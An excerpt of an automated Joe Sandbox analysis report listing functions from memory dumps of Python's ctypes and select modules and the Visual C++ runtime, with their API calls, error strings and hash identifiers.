Associated: 00000007.00000002.2087988693.00007FF8B9065000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000007.00000002.2088065900.00007FF8B9066000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9060000_lib.jbxd

Similarity

API ID: DeallocErr_$Deadline_Eval_FromStringThreadTime__errno$CheckDescriptorErrorExceptionFastFileInitLastMatchesObjectObject_OccurredPackRestoreSaveSecondsSequence_SignalsTimeval_clampTuple_Windowsselect
String ID: timeout must be a float or None$timeout must be non-negative
API String ID: 1581318368-2150404077
Opcode ID: af26c906d80cdcaef9b1c7707cf0177dbe53b8e671061a6009a46fe445b3fcbf
Instruction ID: f171c764be8f5400dcb6dc5e8991077b9fbab6d155eb4fbc7f9741eb80b87944
Opcode Fuzzy Hash: af26c906d80cdcaef9b1c7707cf0177dbe53b8e671061a6009a46fe445b3fcbf
Instruction Fuzzy Hash: 49910E62A08AC396EE21DF2DE8541B963A4FF45BD4F404135DB4E8BA98DF3CD54AC740

Function 00007FF8B93C2E40 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 127COMMON

Download Yara Rule

APIs

PyDict_GetItemWithError.PYTHON311 ref: 00007FF8B93C2E50
PyErr_Occurred.PYTHON311 ref: 00007FF8B93C2E69
PyMem_Malloc.PYTHON311 ref: 00007FF8B93C2EAE
PyObject_CallFunction.PYTHON311 ref: 00007FF8B93C2EFC
PyMem_Free.PYTHON311 ref: 00007FF8B93C2F08
PyDict_SetItem.PYTHON311 ref: 00007FF8B93C2F23
PyUnicode_AsUTF8.PYTHON311 ref: 00007FF8B93C7BAD
PyMem_Malloc.PYTHON311 ref: 00007FF8B93C7BD3
PyObject_CallFunction.PYTHON311 ref: 00007FF8B93C7C0B
PyMem_Free.PYTHON311 ref: 00007FF8B93C7C17
PyLong_FromVoidPtr.PYTHON311 ref: 00007FF8B93C7C29
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C7C48
PyErr_SetString.PYTHON311 ref: 00007FF8B93C7CA8

Strings

LP_%s, xrefs: 00007FF8B93C2EC4, 00007FF8B93C7BE4
s(O){}, xrefs: 00007FF8B93C7C04
s(O){sO}, xrefs: 00007FF8B93C2EF5
_type_, xrefs: 00007FF8B93C2EDA
must be a ctypes type, xrefs: 00007FF8B93C7C9E

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Mem_$CallDict_Err_FreeFunctionItemMallocObject_$DeallocErrorFromLong_OccurredStringUnicode_VoidWith
String ID: LP_%s$_type_$must be a ctypes type$s(O){sO}$s(O){}
API String ID: 2461613936-2311978994
Opcode ID: dac97228159b1c0431957491c5f87e729db2124b065f25bc7d08890040e0cdb2
Instruction ID: 04fca8f04d9b86f18042084b0c43adc149a912822a4f276b955949d426976663
Opcode Fuzzy Hash: dac97228159b1c0431957491c5f87e729db2124b065f25bc7d08890040e0cdb2
Instruction Fuzzy Hash: F3510025A09BCB81EA659F2DA96417923B8EF4EFD1F442231DB1E167A4DE3CE4498300

Function 00007FF8B93C9798 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

PyIndex_Check.PYTHON311 ref: 00007FF8B93C97B3
PyNumber_AsSsize_t.PYTHON311 ref: 00007FF8B93C97CC
PyErr_Occurred.PYTHON311 ref: 00007FF8B93C97DB
PySlice_Unpack.PYTHON311 ref: 00007FF8B93C9825
PySlice_AdjustIndices.PYTHON311 ref: 00007FF8B93C9843
PyBytes_FromStringAndSize.PYTHON311 ref: 00007FF8B93C988C
PyMem_Malloc.PYTHON311 ref: 00007FF8B93C98AD
PyErr_NoMemory.PYTHON311 ref: 00007FF8B93C98BB
PyBytes_FromStringAndSize.PYTHON311 ref: 00007FF8B93C98E3
PyMem_Free.PYTHON311 ref: 00007FF8B93C98EF
PyUnicode_New.PYTHON311 ref: 00007FF8B93C9924
PyUnicode_FromWideChar.PYTHON311 ref: 00007FF8B93C9941
PyList_New.PYTHON311 ref: 00007FF8B93C99A2

Strings

indices must be integers, xrefs: 00007FF8B93C99FD

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: From$Bytes_Err_Mem_SizeSlice_StringUnicode_$AdjustCharCheckFreeIndex_IndicesList_MallocMemoryNumber_OccurredSsize_tUnpackWide
String ID: indices must be integers
API String ID: 4188490530-2024404580
Opcode ID: e570ecff3f3fa346b7648cae94d04275b3108b85bd0816525fe5c5b16466f0b5
Instruction ID: f66d52dee5a02e7edbd5f9b004f7c29900ce10d54b5158148481fd1948d8dae5
Opcode Fuzzy Hash: e570ecff3f3fa346b7648cae94d04275b3108b85bd0816525fe5c5b16466f0b5
Instruction Fuzzy Hash: 3F718025A09FC682EB249F2A99640792376FF4DFE4B062131DF1E57B95DE3CE8098300

Function 00007FF8B93CD4A0 Relevance: 33.3, APIs: 18, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

PyUnicode_FromFormatV.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B93C7997), ref: 00007FF8B93CD4C5
PyErr_Fetch.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B93C7997), ref: 00007FF8B93CD4E4
PyErr_NormalizeException.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B93C7997), ref: 00007FF8B93CD4F6
PyType_GetName.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B93C7997), ref: 00007FF8B93CD50D
PyObject_Str.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B93C7997), ref: 00007FF8B93CD515
PyUnicode_AppendAndDel.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B93C7997), ref: 00007FF8B93CD527
PyUnicode_FromString.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B93C7997), ref: 00007FF8B93CD534
PyUnicode_AppendAndDel.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B93C7997), ref: 00007FF8B93CD541
PyErr_Clear.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B93C7997), ref: 00007FF8B93CD550
PyObject_Str.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B93C7997), ref: 00007FF8B93CD55A
PyErr_Clear.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B93C7997), ref: 00007FF8B93CD565
PyUnicode_FromString.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B93C7997), ref: 00007FF8B93CD572
PyUnicode_AppendAndDel.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B93C7997), ref: 00007FF8B93CD57F
PyErr_SetObject.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B93C7997), ref: 00007FF8B93CD594
_Py_Dealloc.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B93C7997), ref: 00007FF8B93CD5A9
_Py_Dealloc.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B93C7997), ref: 00007FF8B93CD5BE
_Py_Dealloc.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B93C7997), ref: 00007FF8B93CD5D3
_Py_Dealloc.PYTHON311(?,?,?,?,?,?,00000000,?,00007FF8B93C7997), ref: 00007FF8B93CD5E8

Strings

???, xrefs: 00007FF8B93CD56B

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Unicode_$Err_$Dealloc$AppendFrom$ClearObject_String$ExceptionFetchFormatNameNormalizeObjectType_
String ID: ???
API String ID: 979652146-1053719742
Opcode ID: a0277b81e7bf4beead51eb80468770295d906e45afe09c37c0bcdcee4447fb49
Instruction ID: c280616917d80ef6e9d721b5b1500d16e9bfe09182cef33cfa7d4b96c5b62913
Opcode Fuzzy Hash: a0277b81e7bf4beead51eb80468770295d906e45afe09c37c0bcdcee4447fb49
Instruction Fuzzy Hash: 2E412772E09E8685EF549F68D8641BD23B4EF4DB98F042435DB1E52664DF3CA449C320

Function 00007FF8B93C9E68 Relevance: 33.3, APIs: 13, Strings: 6, Instructions: 78threadlibraryloaderCOMMON

Download Yara Rule

APIs

_PyArg_ParseTuple_SizeT.PYTHON311 ref: 00007FF8B93C9E90
PySys_Audit.PYTHON311 ref: 00007FF8B93C9EAB
PyObject_GetAttrString.PYTHON311 ref: 00007FF8B93C9EC1
PyErr_SetString.PYTHON311 ref: 00007FF8B93C9EF0
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C9EFF
PyLong_AsVoidPtr.PYTHON311 ref: 00007FF8B93C9F1A
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C9F2C
PyErr_Occurred.PYTHON311 ref: 00007FF8B93C9F32
PyErr_SetString.PYTHON311 ref: 00007FF8B93C9F4E
PyEval_SaveThread.PYTHON311 ref: 00007FF8B93C9F56
GetProcAddress.KERNEL32 ref: 00007FF8B93C9F67
PyEval_RestoreThread.PYTHON311 ref: 00007FF8B93C9F73
PyErr_Format.PYTHON311 ref: 00007FF8B93C9F94

Strings

the _handle attribute of the second argument must be an integer, xrefs: 00007FF8B93C9EE6
ctypes.dlsym, xrefs: 00007FF8B93C9EA4
Os:in_dll, xrefs: 00007FF8B93C9E89
_handle, xrefs: 00007FF8B93C9EBA
symbol '%s' not found, xrefs: 00007FF8B93C9F85
could not convert the _handle attribute to a pointer, xrefs: 00007FF8B93C9F44

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_$String$DeallocEval_Thread$AddressArg_AttrAuditFormatLong_Object_OccurredParseProcRestoreSaveSizeSys_Tuple_Void
String ID: Os:in_dll$_handle$could not convert the _handle attribute to a pointer$ctypes.dlsym$symbol '%s' not found$the _handle attribute of the second argument must be an integer
API String ID: 1915345233-3856192562
Opcode ID: 7ca03c74892ce7554a02cb8c30f6c35098380688a7c70d2a3342523bcc2a4215
Instruction ID: 66282571583f9fe5ed9b855258fcc0371bc9065a3f4f914e687fb47f54325485
Opcode Fuzzy Hash: 7ca03c74892ce7554a02cb8c30f6c35098380688a7c70d2a3342523bcc2a4215
Instruction Fuzzy Hash: FC31ED21A09F8682EA659F6AE8641792378EF8EFC1F056035DB0E47765DF2CE549C300

Function 00007FF8B93CF724 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 157COMMON

Download Yara Rule

APIs

PyObject_GetAttrString.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B93C8C2F), ref: 00007FF8B93CF756
PySequence_Fast.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B93C8C2F), ref: 00007FF8B93CF772
_Py_Dealloc.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B93C8C2F), ref: 00007FF8B93CF784
PyArg_ParseTuple.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B93C8C2F), ref: 00007FF8B93CF7E8
PyObject_GetAttr.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B93C8C2F), ref: 00007FF8B93CF802
_Py_Dealloc.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B93C8C2F), ref: 00007FF8B93CF854
_Py_Dealloc.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B93C8C2F), ref: 00007FF8B93CF8D0
PyObject_SetAttr.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B93C8C2F), ref: 00007FF8B93CF8E4
_Py_Dealloc.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B93C8C2F), ref: 00007FF8B93CF8F8
_Py_Dealloc.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B93C8C2F), ref: 00007FF8B93CF917
_Py_Dealloc.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B93C8C2F), ref: 00007FF8B93CF931
_Py_Dealloc.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B93C8C2F), ref: 00007FF8B93CF940
PyErr_SetString.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B93C8C2F), ref: 00007FF8B93CF972
_Py_Dealloc.PYTHON311(?,?,?,?,?,00000018,00000000,00000018,00000000,?,?,00007FF8B93C8C2F), ref: 00007FF8B93CF983

Strings

_fields_ must be a sequence, xrefs: 00007FF8B93CF768
OO|O, xrefs: 00007FF8B93CF7E1
_fields_, xrefs: 00007FF8B93CF748
unexpected type, xrefs: 00007FF8B93CF968

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dealloc$AttrObject_$String$Arg_Err_FastParseSequence_Tuple
String ID: OO|O$_fields_$_fields_ must be a sequence$unexpected type
API String ID: 1182381414-2418103425
Opcode ID: 9a21982e818a441de51ee13329167cb0591f09edfc229330b12a1e4341a6436c
Instruction ID: 92f4132b923f13edbffaabb01e6c70fb6dbbdecd64f79a228d14ff92a316a070
Opcode Fuzzy Hash: 9a21982e818a441de51ee13329167cb0591f09edfc229330b12a1e4341a6436c
Instruction Fuzzy Hash: 19612672A09F8692EB648F2AE95417A63B5FF89BE4F146131CB4E03764DF3DE4598300

Function 00007FF8B93C5028 Relevance: 30.1, APIs: 20, Instructions: 148COMMON

Download Yara Rule

APIs

PyType_Ready.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C504E
PyType_Ready.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5065
PyType_Ready.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C507D
PyType_Ready.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C50A0
PyType_Ready.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C50C6
PyType_Ready.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C50EC
PyType_Ready.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5112
PyType_Ready.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5138
PyType_Ready.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C515E
PyType_Ready.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5181
PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C51A7
PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C51CD
PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C51F3
PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5219
PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C523F
PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C526C
PyType_Ready.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C5281
PyType_Ready.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C52A0
PyType_Ready.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C52B1
PyType_Ready.PYTHON311(?,?,00000000,00007FF8B93C4FF4,?,?,?,00007FF8B93C4F7C), ref: 00007FF8B93C52D3

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: ReadyType_$Module_Type
String ID:
API String ID: 2298540608-0
Opcode ID: 54f91af859aac5329c47ad103bf883f4ecd078e41e036d01a27fff442e20b039
Instruction ID: 212f811c720cf378387011fd6601d1e4ecc2743ca3fb7d04bfe3b03ade388fb6
Opcode Fuzzy Hash: 54f91af859aac5329c47ad103bf883f4ecd078e41e036d01a27fff442e20b039
Instruction Fuzzy Hash: 4B718164A0DB9792F6618F2DBD6412A23ACBF49BC4F806135DA5E93674DF3CF11A8310

Function 00007FF8B9F6C78C Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 289COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6C81D
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6C856
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6C92A
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6C93B
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6C9A3
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6C9B3
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6C9FF
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6CA11
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6CB83

Part of subcall function 00007FF8B9F6E72C: Replicator::operator[].LIBVCRUNTIME ref: 00007FF8B9F6E786

DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6CC05
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6CC14

Strings

`anonymous namespace', xrefs: 00007FF8B9F6CAE3

Memory Dump Source

Source File: 00000007.00000002.2088453756.00007FF8B9F61000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9F60000, based on PE: true

Associated: 00000007.00000002.2088414184.00007FF8B9F60000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088589734.00007FF8B9F76000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088624293.00007FF8B9F77000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9f60000_lib.jbxd

Similarity

API ID: Name::operator+$Replicator::operator[]
String ID: `anonymous namespace'
API String ID: 3863519203-3062148218
Opcode ID: 29843075ff213e4678463bd9e4c4852a4219599ce3764149382065ef125c3596
Instruction ID: b173a94ebff06591c02058e3caed1e6d92a00e3fb1a14addc3ca50ac89333633
Opcode Fuzzy Hash: 29843075ff213e4678463bd9e4c4852a4219599ce3764149382065ef125c3596
Instruction Fuzzy Hash: 35E14772A08BC699EB10CF68E4801AC7BA0FB457A5F50A136EB9D17B69DF3CE554C700

Function 00007FF8B93C26C0 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 191COMMON

Download Yara Rule

Strings

Expected a COM this pointer as first argument, xrefs: 00007FF8B93C7469
native com method call without 'this' parameter, xrefs: 00007FF8B93C73E2
this function takes %d argument%s (%d given), xrefs: 00007FF8B93C74F4
this function takes at least %d argument%s (%d given), xrefs: 00007FF8B93C7414
COM method call without VTable, xrefs: 00007FF8B93C73EB
NULL COM pointer access, xrefs: 00007FF8B93C74C3

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID:
String ID: COM method call without VTable$Expected a COM this pointer as first argument$NULL COM pointer access$native com method call without 'this' parameter$this function takes %d argument%s (%d given)$this function takes at least %d argument%s (%d given)
API String ID: 0-1981512665
Opcode ID: f07b7bceabcce526c4a62d906a5ec0dd6d9bc262e596e910abc21d3a49bdda52
Instruction ID: e5bd62d8ef913eab0baa7413c6859bc645397c8487f3960d863ebe168e905198
Opcode Fuzzy Hash: f07b7bceabcce526c4a62d906a5ec0dd6d9bc262e596e910abc21d3a49bdda52
Instruction Fuzzy Hash: C3912526A09F8681EA60CF2AA49027A67B4FF8DBD4F446035DF4E077A4DF3DE4488700

Function 00007FF8B93C2C90 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

PyBytes_AsString.PYTHON311(?,?,00000001,00007FF8B93C2C87), ref: 00007FF8B93C2D68
PyLong_AsUnsignedLong.PYTHON311(?,?,00000001,00007FF8B93C2C87), ref: 00007FF8B93C7A1F
PyErr_Occurred.PYTHON311(?,?,00000001,00007FF8B93C2C87), ref: 00007FF8B93C7A31
PyErr_Clear.PYTHON311(?,?,00000001,00007FF8B93C2C87), ref: 00007FF8B93C7A40
PyLong_AsLong.PYTHON311(?,?,00000001,00007FF8B93C2C87), ref: 00007FF8B93C7A49
PyErr_Occurred.PYTHON311(?,?,00000001,00007FF8B93C2C87), ref: 00007FF8B93C7A5B
PyErr_SetString.PYTHON311(?,?,00000001,00007FF8B93C2C87), ref: 00007FF8B93C7A7B
PyUnicode_AsWideCharString.PYTHON311(?,?,00000001,00007FF8B93C2C87), ref: 00007FF8B93C7A98
PyCapsule_New.PYTHON311(?,?,00000001,00007FF8B93C2C87), ref: 00007FF8B93C7ABC
PyMem_Free.PYTHON311(?,?,00000001,00007FF8B93C2C87), ref: 00007FF8B93C7AD3

Strings

_ctypes pymem, xrefs: 00007FF8B93C7AB5
Don't know how to convert parameter %d, xrefs: 00007FF8B93C7B27
int too long to convert, xrefs: 00007FF8B93C7A71

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_$String$LongLong_Occurred$Bytes_Capsule_CharClearFreeMem_Unicode_UnsignedWide
String ID: Don't know how to convert parameter %d$_ctypes pymem$int too long to convert
API String ID: 3969321993-4137960972
Opcode ID: 84a72b6a64f7e58ef7106ff91161727bef33725574b0370cedf856625ec34b12
Instruction ID: 0d296ea9a8cb06b400bf603e47ca22f028d99b0ebac9c00de3ac95c8f8d3ac53
Opcode Fuzzy Hash: 84a72b6a64f7e58ef7106ff91161727bef33725574b0370cedf856625ec34b12
Instruction Fuzzy Hash: 8F510426A09F8682EB548F2DE8A412A23B4FF4DFD4B046535DB5E43764DF3CE4588350

Function 00007FF8B93C1404 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 117COMMON

Download Yara Rule

APIs

PyLong_FromSsize_t.PYTHON311 ref: 00007FF8B93C1458
PyTuple_Pack.PYTHON311 ref: 00007FF8B93C1475
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C14AD
PyErr_Occurred.PYTHON311 ref: 00007FF8B93C14D9
_PyObject_CallFunction_SizeT.PYTHON311 ref: 00007FF8B93C154D
PyDict_New.PYTHON311 ref: 00007FF8B93C1584
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C6A03

Part of subcall function 00007FF8B93C15A4: PyDict_GetItemWithError.PYTHON311(?,?,?,?,00007FF8B93C1499), ref: 00007FF8B93C15AF

Strings

_length_, xrefs: 00007FF8B93C1529
s(O){s:n,s:O}, xrefs: 00007FF8B93C153F
Expected a type object, xrefs: 00007FF8B93C6A16
Array length must be >= 0, not %zd, xrefs: 00007FF8B93C69EE
%.200s_Array_%Id, xrefs: 00007FF8B93C14FD
_type_, xrefs: 00007FF8B93C1516

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: DeallocDict_$CallErr_ErrorFromFunction_ItemLong_Object_OccurredPackSizeSsize_tTuple_With
String ID: %.200s_Array_%Id$Array length must be >= 0, not %zd$Expected a type object$_length_$_type_$s(O){s:n,s:O}
API String ID: 2975079148-1488966637
Opcode ID: 4b9e39d2e5c219fd7f77c84992df2d80c2fda8daf9d237960527683bdad92fae
Instruction ID: cad5e35ce802fd158c8b2071f0f6731ea538e513ccf9b23d19f4fb829e391391
